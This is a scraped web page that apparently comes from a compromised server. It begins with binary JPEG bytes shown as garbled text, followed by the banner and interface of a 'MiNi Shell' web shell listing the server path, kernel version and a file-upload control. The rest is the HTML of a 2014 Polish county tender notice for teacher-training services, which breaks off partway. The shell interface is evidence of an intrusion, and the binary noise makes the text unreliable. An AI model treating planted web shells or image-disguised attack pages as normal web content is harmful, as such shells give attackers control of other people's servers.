JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141017/346604-N-2014.html

<p class="kh_header"><b>Jarocin: Realizacja form doskonalenia nauczycieli w ramach projektu Kompleksowy Program Wspomagania Rozwoju Szkół i Przedszkoli na terenie Powiatu Jarocińskiego</b><br>
<b>Numer ogłoszenia: 346604 - 2014; data zamieszczenia: 17.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Jarociński , al. Niepodległości 10-12, 63-200 Jarocin, woj. wielkopolskie, tel. 062 7472920, faks 062 7473337.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-jarocinski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja form doskonalenia nauczycieli w ramach projektu Kompleksowy Program Wspomagania Rozwoju Szkół i Przedszkoli na terenie Powiatu Jarocińskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest realizacja form doskonalenia nauczycieli (warsztaty, szkolenia, wykłady, konsultacje, seminaria) dla uczestników projektu Kompleksowy Program Wspomagania Rozwoju Szkół oraz Przedszkoli na terenie Powiatu Jarocińskiego współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet III: Wysoka jakość systemu oświaty, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół. Usługi skierowane będą bezpośrednio do uczestników projektu, którymi będą dyrektorzy/ki, nauczyciele/ki szkół i przedszkoli z powiatu jarocińskiego. 
Głównym celem projektu jest podniesienia jakości funkcjonowania systemu doskonalenia nauczycieli z 34 szkół/przedszkoli w Powiecie Jarocińskim w obszarach wymagających wsparcia.
2.  Realizacja form doskonalenia nauczycieli odbywać się będzie w ramach opracowanych 34 Rocznych Planów Wspomagania.

Realizacja form doskonalenia nauczycieli obejmuje ogółem 918 godzin dydaktycznych (45 min), w tym:
a)	szkolenia rad pedagogicznych w ramach Rocznych Planów Wspomagania - 408 godzin (34 placówki  x 1 szkolenie po  12 godzin dydaktycznych). 
Usługę edukacyjną stanowi: opracowanie programu szkolenia przez specjalistę/eksperta oraz przygotowanie przez niego materiałów dla uczestników
i przeprowadzenie szkolenia). Wykonawca zapewnia materiały dla uczestników: programy, bibliografia, teczka, skoroszyt i długopis. 
b)	konsultacje indywidualne i zbiorowe w ramach obszarów - 510 godzin dydaktycznych  (34 placówki x 3 spotkania po 5 godzin z ekspertami/specjalistami  w ramach 1. RPW). Wykonawca zapewnia materiały opatrzone wymaganymi logotypami dla uczestników:  teczka, skoroszyt i długopis.

3. Formy doskonalenia nauczycieli realizowane będą w następujących placówkach oświatowych:
1)	Zespół Szkół Ogólnokształcących, Ul. T. Kościuszki 31, 63-200 Jarocin
2)	Niepubliczne Gimnazjum im. T. Kościuszki, Ul. T. Kościuszki 31, 63-200 Jarocin
3)	Szkoła Podstawowa im. M. Kalinowskiego, Ul. Szkolna 1A,  63-230 Witaszyce
4)	Publiczne Przedszkole, Ul. Kolejowa 7, 63-233 Jaraczewo
5)	Niepubliczne Przedszkole i Niepubliczna Szkoła Podstawowa w Siedleminie, 
Ul. Główna 36, 63-200 Jarocin 
6)	Niepubliczna Szkoła Podstawowa w Bachorzewie, Ul. Szkolna 8, 63-200 Jarocin
7)	Niepubliczne Przedszkole Puchatek w Golinie, Ul. Dworcowa 11, 63-200 Jarocin
8)	Szkoła Podstawowa nr 5, Ul. Waryńskiego 11, 63-200 Jarocin
9)	Gimnazjum nr 5, Ul. Waryńskiego 11, 63-200 Jarocin
10)	 Niepubliczne Przedszkole Tęcza im. Macieja Kostki, Radlin 29, 63-200 Jarocin
11)	Gimnazjum im. Jana Pawła II, Ul. M. Konopnickiej 22, 63-220 Kotlin
12)	Szkoła Podstawowa im. M. Konopnickiej, Ul. M. Konopnickiej 22, 63-220 Kotlin
13)	Szkoła Podstawowa im. Kornela Makuszyńskiego, Wola Książęca 103, 63-220 Kotlin
14)	 Szkoła Podstawowa, Magnuszewice 17, 63-220 Kotlin
15)	 Gimnazjum im. Niepodległości Polski, Wola Książęca 103, 63-220 Kotlin
16)	 Gimnazjum im. Zjednoczonej Europy, Ul. Szkolna 1A, 63-230 Witaszyce
17)	 Zespół Szkół Przyrodniczo-Biznesowych, Tarce 19,  63-200 Jarocin
18)	 III Liceum Ogólnokształcące, Ul. Franciszkańska 2, 63-200 Jarocin
19)	Technikum nr 2, Ul. Franciszkańska 2, 63-200 Jarocin
20)	 Zasadnicza Szkoła Zawodowa nr 2, Ul. Franciszkańska 2, 63-200 Jarocin
21)	 II Liceum Ogólnokształcące, Ul. Franciszkańska 1, 63-200 Jarocin
22)	Technikum nr 1, Ul. Franciszkańska 1, 63-200 Jarocin
23)	 Zasadnicza Szkoła Zawodowa nr 1, Ul. Franciszkańska 1, 63-200 Jarocin
24)	Szkoła Podstawowa im. Adama Mickiewicza, Ul. Cmentarna 10, 63-210 Żerków
25)	Szkoła Podstawowa w Chrzanie, Ul. Żerkowska 3, 63-210 Żerków
26)	Niepubliczne Przedszkole w Łuszczanowie, Ul. Długa 108, 63-200 Jarocin
27)	Niepubliczna Szkoła Podstawowa  w Łuszczanowie, Ul. Długa 108, 63-200 Jarocin
28)	Niepubliczne Gimnazjum w Łuszczanowie, Ul. Długa 108, 63-200 Jarocin
29)	Szkoła Podstawowa im. Ks. Jana Twardowskiego, Dobieszczyzna 32, 63- 210 Żerków
30)	Szkoła Podstawowa w Komorzu, Komorze Przybysławskie 18, 63-210 Żerków
31)	 Gimnazjum nr 1 im. Zbigniewa Herberta, Ul. Cmentarna 10, 63-210 Żerków
32)	 Społeczna Szkoła Podstawowa, Ul. Przemysłowa 1, 63-200 Jarocin
33)	 Niepubliczne Szkoła Podstawowa im. Św. Jadwigi Królowej Polski, Lubinia Mała 59, 
    63-210 Żerków
34)	 Niepubliczne Przedszkole Poziomka, Ul. Wrocławska 168, 63-200 Jarocin. 

4. Wykonawca powinien zabezpieczyć kompleksową realizację form doskonalenia nauczycieli na najwyższym poziomie merytorycznym w następujących obszarach, których założenia zostały wypracowane w ramach Projektu Kompleksowy Program Wspomagania Rozwoju Szkół oraz Przedszkoli na terenie Powiatu Jarocińskiego:
Obszar 1 Jak pomóc uczniowi osiągnąć sukces edukacyjny? w 4 placówkach ogółem 
108 godzin dydaktycznych zajęć , w tym:
- zajęcia warsztatowe 48 godzin (4 placówki x 1 szkolenie x 12 godzin),
- konsultacje zbiorowe i indywidualne - 60 godzin (4 placówki x 3 spotkania po 5 godzin z ekspertem) w następujących placówkach:
1. Szkoła Podstawowa, Magnuszewice 17, 63-220 Kotlin
2. Niepubliczne Szkoła Podstawowa im. Św. Jadwigi Królowej Polski, Lubinia Mała 59,     63-210 Żerków
      3. Zasadnicza Szkoła Zawodowa nr 2, Ul. Franciszkańska 2, 63-200 Jarocin
4. Szkoła Podstawowa w Komorzu, Komorze Przybysławskie 18, 63-210 Żerków

Obszar 2 Ocenianie kształtujące w 1 placówce ogółem 27 godzin dydaktycznych zajęć , w tym:
- zajęcia warsztatowe 12 godzin (1 placówka x 1 szkolenie x 12 godzin),
- konsultacje zbiorowe i indywidualne - 15 godzin (3 spotkania po 5 godzin z ekspertem) w następującej placówce:
1. Szkoła Podstawowa w Chrzanie, Ul. Żerkowska 3, 63-210 Żerków

Obszar 3 Techniki uczenia się i metody motywujące do nauki w 7 placówkach ogółem 189 godzin dydaktycznych zajęć , w tym:
- zajęcia warsztatowe 84 godziny (7 placówek x 1 szkolenie x 12 godzin),
- konsultacje zbiorowe i indywidualne - 105 godzin (7 placówek x 3 spotkania po 5 godzin z ekspertem) w następujących placówkach:
	1. Szkoła Podstawowa im. Ks. Jana Twardowskiego, Dobieszczyzna 32, 63- 210 Żerków
	2. Niepubliczne Przedszkole Poziomka, Ul. Wrocławska 168, 63-200 Jarocin
	3. Szkoła Podstawowa im. M. Kalinowskiego, Ul. Szkolna 1A,  63-230 Witaszyce
	4. Zasadnicza Szkoła Zawodowa nr 1, Ul. Franciszkańska 1, 63-200 Jarocin
	5. Technikum nr 1, Ul. Franciszkańska 1, 63-200 Jarocin
	6. II Liceum Ogólnokształcące, Ul. Franciszkańska 1, 63-200 Jarocin
	7. Gimnazjum nr 5, Ul. Waryńskiego 11, 63-200 Jarocin

Obszar 4 Uczeń - aktywny uczestnik procesu uczenia się w 1 placówce ogółem 27 godzin dydaktycznych zajęć , w tym:
- zajęcia warsztatowe 12 godzin (1 placówka x 1 szkolenie x 12 godzin),
- konsultacje zbiorowe i indywidualne - 15 godzin (3 spotkania po 5 godzin z ekspertem) w następującej placówce:
         III Liceum Ogólnokształcące, Ul. Franciszkańska 2, 63-200 Jarocin

Obszar 7 Wspieranie pracy wychowawców klas w 4 placówkach ogółem 
108 godzin dydaktycznych zajęć , w tym:
- zajęcia warsztatowe 48 godzin (4 placówki x 1 szkolenie x 12 godzin),
- konsultacje zbiorowe i indywidualne - 60 godzin (4 placówki x 3 spotkania po 5 godzin z ekspertem) w następujących placówkach:
1. Szkoła Podstawowa im. Kornela Makuszyńskiego, Wola Książęca 103, 63-220 Kotlin
2. Szkoła Podstawowa im. M. Konopnickiej, Ul. M. Konopnickiej 22, 63-220 Kotlin
3. Zespół Szkół Przyrodniczo-Biznesowych, Tarce 19,  63-200 Jarocin
4. Gimnazjum im. Zjednoczonej Europy, Ul. Szkolna 1A, 63-230 Witaszyce


Obszar 8 Postawy uczniowskie. Jak je kształtować? w 2 placówkach ogółem 54 godziny dydaktycznych zajęć, w tym:
- zajęcia warsztatowe 24 godzin (2 placówki x 1 szkolenie x 12 godzin),
- konsultacje zbiorowe i indywidualne - 30 godzin (2 placówki x 3 spotkania po 5 godzin 
z ekspertem) w następujących placówkach:
1.	Gimnazjum nr 1 im. Zbigniewa Herberta, Ul. Cmentarna 10, 63-210 Żerków
2.	Gimnazjum im. Niepodległości Polski, Wola Książęca 103, 63-220 Kotlin

Obszar 10  Praca z uczniem młodszym w 5 placówkach ogółem 135 godzin dydaktycznych zajęć , w tym:
- zajęcia warsztatowe 60 godzin (5 placówek x 1 szkolenie x 12 godzin),
- konsultacje zbiorowe i indywidualne - 75 godzin (5 placówek x 3 spotkania po 5 godzin z ekspertem) w następujących placówkach:
1. Niepubliczne Przedszkole w Łuszczanowie, Ul. Długa 108, 63-200 Jarocin
2. Niepubliczne Przedszkole Puchatek w Golinie, Ul. Dworcowa 11, 63-200 Jarocin
3. Niepubliczne Przedszkole Tęcza im. Macieja Kostki, Radlin 29, 63-200 Jarocin
4. Publiczne Przedszkole, Ul. Kolejowa 7, 63-233 Jaraczewo
5. Społeczna Szkoła Podstawowa, Ul. Przemysłowa 1, 63-200 Jarocin

Obszar 12  Praca z uczniem o specjalnych potrzebach edukacyjnych w 2 placówkach ogółem 54 godziny dydaktycznych zajęć, w tym:
- zajęcia warsztatowe 24 godzin (2 placówki x 1 szkolenie x 12 godzin),
- konsultacje zbiorowe i indywidualne - 30 godzin (2 placówki x 3 spotkania po 5 godzin z ekspertem) w następujących placówkach:
	1. Szkoła Podstawowa nr 5, Ul. Waryńskiego 11, 63-200 Jarocin
2. Technikum nr 2, Ul. Franciszkańska 2, 63-200 Jarocin

Obszar 16  Rodzice są partnerami szkoły w 1 placówce ogółem 27 godzin dydaktycznych zajęć , w tym:
- zajęcia warsztatowe 12 godzin (1 placówka x 1 szkolenie x 12 godzin),
- konsultacje zbiorowe i indywidualne - 15 godzin (3 spotkania po 5 godzin z ekspertem) w następującej placówce:
        	Niepubliczna Szkoła Podstawowa w Bachorzewie, Ul. Szkolna 8, 63-200 Jarocin

Obszar 21  Współpraca nauczycieli w prowadzeniu procesów edukacyjnych w 1 placówce ogółem 27 godzin dydaktycznych zajęć , w tym:
- zajęcia warsztatowe 12 godzin (1 placówka x 1 szkolenie x 12 godzin),
- konsultacje zbiorowe i indywidualne - 15 godzin (3 spotkania po 5 godzin z ekspertem) w następującej placówce:
Niepubliczna Szkoła Podstawowa  w Łuszczanowie, Ul. Długa 108, 63-200 Jarocin.

Obszar 23   Jak i po co prowadzić ewaluację wewnętrzną  w 6 placówkach 162 godziny dydaktyczne zajęć, w tym:
- zajęcia warsztatowe 72 godziny (6 placówek x 1 szkolenie x 12 godzin),
- konsultacje zbiorowe i indywidualne - 90 godzin (6 placówek x 3 spotkania po 5 godzin 
z ekspertem) w następujących placówkach:
1. Zespół Szkół Ogólnokształcących, Ul. T. Kościuszki 31, 63-200 Jarocin
2. Niepubliczne Gimnazjum im. T. Kościuszki, Ul. T. Kościuszki 31, 63-200 Jarocin
3. Niepubliczne Gimnazjum w Łuszczanowie, Ul. Długa 108, 63-200 Jarocin
4. Szkoła Podstawowa im. Adama Mickiewicza, Ul. Cmentarna 10, 63-210 Żerków
5. Niepubliczne Przedszkole i Niepubliczna Szkoła Podstawowa w Siedleminie, 
Ul. Główna 36, 63-200 Jarocin 
6. Gimnazjum im. Jana Pawła II, Ul. M. Konopnickiej 22, 63-220 Kotlin

Liczba uczestników/uczestniczek w każdej grupie, dla której prowadzona będzie określona forma doskonalenia nauczycieli, zostanie przekazana Wykonawcy przez właściwego SORE, na co najmniej 7 dni przed rozpoczęciem formy doskonalenia.

5. Wykonawca ponosi odpowiedzialność za merytoryczną realizację form doskonalenia nauczycieli w ramach Rocznych Planów Wspomagania. Po podpisaniu umowy Zamawiający przekaże Wykonawcy  harmonogramy  zajęć: w roku szkolnym 2014/2015 w ramach: Rocznych Planów Wspomagania - najpóźniej na 7 dni przed rozpoczęciem zajęć.  Szkolenia i konsultacje odbywać się będą głównie w godzinach popołudniowych w dniach od poniedziałku do piątku, natomiast  w soboty albo dni wolne od pracy, tj. ferie w godzinach przedpołudniowych. Zamawiający wymaga, aby szkolenia i konsultacje  zostały przeprowadzone zgodnie z opisem programów szkoleń dostarczonych przez Zamawiającego. 
6.  Obowiązki Wykonawcy:
1)	zapewnienie trenerów, szkoleniowców, wykładowców, konsultantów, ekspertów/specjalistów niezbędnych do prawidłowego wykonania przedmiotu zamówienia;
2)	przesyłanie Zamawiającemu za pośrednictwem Szkolnych Organizatorów Rozwoju Edukacji (SORE) - nie później niż 7 dni przed rozpoczęciem każdego ze szkoleń: materiałów szkoleniowych wykorzystywanych podczas form doskonalenia nauczycieli;
3)	przeprowadzenie tzw. ankiety sukcesu  po każdym 12 godzinnym szkoleniu;  
4)	zapewnienie sprzętu multimedialnego niezbędnego do realizacji przedmiotu zamówienia;
5)	prowadzenie dziennika zajęć, zakresu danych osobowych uczestników (PEFS) i list obecności według wzoru przekazanego przez Zamawiającego;
6)	sporządzenie dokumentacji fotograficznej z każdego 12 godzinnego szkolenia; 
7)	zachowanie w tajemnicy wszelkich danych, do których będzie miał dostęp w związku z realizacją zamówienia.
3.7. Zamawiający zastrzega sobie prawo do hospitacji - w tym oceny jakości prowadzonych zajęć przez Wykonawcę. Hospitacji- w tym oceny, będą dokonywały osoby posiadające odpowiednie kwalifikacje i wyznaczone przez Zamawiającego w tym - osoby z Personelu Projektu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postepowaniu Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada uprawnienia do wykonywania działalności związanej z doskonaleniem nauczycieli, stosownie do przepisów Rozporządzenia Ministra Edukacji Narodowej w dnia 19 listopada 2009 r. w sprawie placówek doskonalenia nauczycieli (Dz.U. Nr 200, poz. 1537 z późn. zm.).
Publiczna placówka doskonalenia nauczycieli musi posiadać akt założycielski, o którym mowa w § 2 ust. 1 ww. rozporządzenia. Niepubliczna placówka doskonalenia nauczycieli musi posiadać wpis do ewidencji prowadzonej przez samorząd województwa właściwy ze względu na siedzibę placówki doskonalenia, zgodnie z § 24 ust. 1 ww. rozporządzenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 100 form doskonalenia nauczycieli (m.in. szkolenia, warsztaty, wykłady, konferencje, kursy kwalifikacyjne), z czego co najmniej 50 form doskonalenia powinno być powyżej 10 godzin dydaktycznych każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Za spełnienie tego warunku uznaje się złożone oświadczenie o spełnianiu warunków udziału określonych w art. 22 ust. 1 ustawy - Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Za spełnienie tego warunku uznaje się złożone oświadczenie o spełnianiu warunków udziału określonych w art. 22 ust. 1 ustawy - Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Za spełnienie tego warunku uznaje się złożone oświadczenie o spełnianiu warunków udziału określonych w art. 22 ust. 1 ustawy - Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Wykonawca, zgodnie z art. 26 ust. 2d ustawy - Prawo zamówień publicznych na obowiązek złożyć oświadczenie zawierające listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy - Prawo zamówień publicznych, albo informację o tym, że Wykonawca nie należy do grupy kapitałowej (wg załącznika nr 5 do niniejszej specyfikacji),
b)	 pełnomocnictwo w przypadku jeżeli Wykonawcę reprezentuje pełnomocnik; pełnomocnictwo powinno być złożone w oryginale lub kopii poświadczonej  notarialnie,
c)	 oferta - wg załącznika nr 1 do siwz.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
